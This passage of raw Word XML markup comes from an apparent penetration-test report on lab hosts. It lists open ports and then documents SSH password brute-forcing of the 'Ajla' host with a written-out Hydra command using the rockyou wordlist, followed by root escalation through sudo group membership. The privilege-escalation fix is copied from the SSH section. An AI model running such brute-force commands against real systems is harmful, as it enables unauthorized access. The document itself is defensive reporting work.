                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                          </w:rPr>
                          <w:t>10.4.4.10</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="6835" w:type="dxa"/>
                        <w:tcBorders>
                          <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                        </w:tcBorders>
                        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
                      </w:tcPr>
                      <w:p w14:paraId="1BEFD8B5" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                        <w:pPr>
                          <w:spacing w:line="360" w:lineRule="auto"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                            <w:sz w:val="24"/>
                            <w:szCs w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                            <w:b/>
                          </w:rPr>
                          <w:t>TCP:</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> 22, 80</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr w:rsidR="00CB67CB" w14:paraId="50C735E9" w14:textId="77777777">
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="2515" w:type="dxa"/>
                        <w:tcBorders>
                          <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                        </w:tcBorders>
                        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
                      </w:tcPr>
                      <w:p w14:paraId="0D1AB76D" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                        <w:pPr>
                          <w:spacing w:line="360" w:lineRule="auto"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                          </w:rPr>
                          <w:t>10.5.5.20</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="6835" w:type="dxa"/>
                        <w:tcBorders>
                          <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                        </w:tcBorders>
                        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
                      </w:tcPr>
                      <w:p w14:paraId="54FB8918" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                        <w:pPr>
                          <w:spacing w:line="360" w:lineRule="auto"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                            <w:sz w:val="24"/>
                            <w:szCs w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                            <w:b/>
                          </w:rPr>
                          <w:t>TCP:</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> 135, 139, 445, 3389</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr w:rsidR="00CB67CB" w14:paraId="43C724EF" w14:textId="77777777">
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="2515" w:type="dxa"/>
                        <w:tcBorders>
                          <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                        </w:tcBorders>
                        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
                      </w:tcPr>
                      <w:p w14:paraId="056BFD78" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                        <w:pPr>
                          <w:spacing w:line="360" w:lineRule="auto"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                          </w:rPr>
                          <w:t>10.5.5.30</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="6835" w:type="dxa"/>
                        <w:tcBorders>
                          <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                        </w:tcBorders>
                        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
                      </w:tcPr>
                      <w:p w14:paraId="1AE7A58F" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                        <w:pPr>
                          <w:spacing w:line="360" w:lineRule="auto"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                            <w:sz w:val="24"/>
                            <w:szCs w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                            <w:b/>
                          </w:rPr>
                          <w:t>TCP:</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> 53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 3389</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                </w:tbl>
                <w:p w14:paraId="49E0B153" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00CB67CB">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:line="360" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="4BFFA873" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:pStyle w:val="Heading2"/>
                    <w:widowControl w:val="0"/>
                    <w:numPr>
                      <w:ilvl w:val="1"/>
                      <w:numId w:val="1"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="0"/>
                    </w:tabs>
                  </w:pPr>
                  <w:bookmarkStart w:id="16" w:name="_44sinio" w:colFirst="0" w:colLast="0"/>
                  <w:bookmarkEnd w:id="16"/>
                  <w:r>
                    <w:t xml:space="preserve">5.1 </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:t>Ajla</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:t xml:space="preserve"> – 10.4.4.10</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="29EE21D0" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:pStyle w:val="Heading3"/>
                    <w:numPr>
                      <w:ilvl w:val="2"/>
                      <w:numId w:val="1"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="0"/>
                    </w:tabs>
                    <w:spacing w:before="0" w:after="240" w:line="360" w:lineRule="auto"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:bookmarkStart w:id="17" w:name="_2jxsxqh" w:colFirst="0" w:colLast="0"/>
                  <w:bookmarkEnd w:id="17"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t>5.1.1 Initial Access – Password Brute-Forcing</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2F9400D4" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Vulnerability Explanation:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> The user account on the </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Ajla</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> host was protected by a trivial password that was cracked within 5 minutes of brute-forcing.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5BF09DCE" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Vulnerability Fix:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> The SSH service should be configured to not accept password-based logins and the user account itself should contain a unique password not contained in the publicly available wordlists.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="38E2CB0B" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Severity: </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Critical</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6F942B5A" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Steps to reproduce the attack:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> rom the initial service scan John discovered that this host is called </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Ajla</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>. After adding the target’s IP to the /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>etc</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">/hosts file, the Hydra tool was run against the SSH service using the machine’s DNS name instead of its IP. With the extracted password at hand John was able to log in as </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>ajla</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> using SSH.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="22500B0A" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                    <w:spacing w:after="200"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">└─$ hydra -l </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>ajla</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> -P /home/kali/rockyou.txt -T 20 </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>sandbox.local</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>ssh</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
                <w:p w14:paraId="73C45579" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:drawing>
                      <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="7E19776E" wp14:editId="3207A16F">
                        <wp:simplePos x="0" y="0"/>
                        <wp:positionH relativeFrom="column">
                          <wp:posOffset>52387</wp:posOffset>
                        </wp:positionH>
                        <wp:positionV relativeFrom="paragraph">
                          <wp:posOffset>635</wp:posOffset>
                        </wp:positionV>
                        <wp:extent cx="5838825" cy="2042160"/>
                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
                        <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="0" distR="0"/>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2"/>
                                <a:srcRect/>
                                <a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5838825" cy="2042160"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:anchor>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4E0FF0CD" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:pStyle w:val="Heading3"/>
                    <w:numPr>
                      <w:ilvl w:val="2"/>
                      <w:numId w:val="1"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="0"/>
                    </w:tabs>
                    <w:spacing w:before="0" w:after="240" w:line="360" w:lineRule="auto"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:bookmarkStart w:id="18" w:name="_z337ya" w:colFirst="0" w:colLast="0"/>
                  <w:bookmarkEnd w:id="18"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t xml:space="preserve">5.1.2 Privilege Escalation – </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t>Sudo</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> group</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5495CD66" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Vulnerability Explanation:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>sudo</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> group allows any user in this group to escalate privileges to the root if they know the user’s password.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="11F5B599" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Vulnerability Fix:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> The SSH service should be configured to not accept password-based logins and the user account itself should contain a unique password not contained in the publicly available wordlists.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1A446582" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Severity: </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Critical</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4CF6E52C" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Steps to reproduce the attack: </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">John spotted that the </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>ajla</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> user was a member of the </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>sudo</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> group immediately upon logging in and using the “id” command. And knowing user’s password, he only needed to use a single command “</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>sudo</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>su</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">” </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>in order to</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> obtain a root shell.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="36C2A49F" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:drawing>
                      <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="69C8FD82" wp14:editId="5EB24A6D">
                        <wp:simplePos x="0" y="0"/>
                        <wp:positionH relativeFrom="column">
                          <wp:posOffset>52387</wp:posOffset>
                        </wp:positionH>
                        <wp:positionV relativeFrom="paragraph">
                          <wp:posOffset>635</wp:posOffset>
                        </wp:positionV>
                        <wp:extent cx="5838825" cy="2717800"/>
                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
                        <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="0" distR="0"/>
                        <wp:docPr id="2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3"/>
                                <a:srcRect/>
                                <a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5838825" cy="2717800"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:anchor>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="64324738" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:pStyle w:val="Heading3"/>
                    <w:numPr>
                      <w:ilvl w:val="2"/>
                      <w:numId w:val="1"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="0"/>
                    </w:tabs>
                    <w:spacing w:before="0" w:after="240" w:line="360" w:lineRule="auto"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:bookmarkStart w:id="19" w:name="_3j2qqm3" w:colFirst="0" w:colLast="0"/>
                  <w:bookmarkEnd w:id="19"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
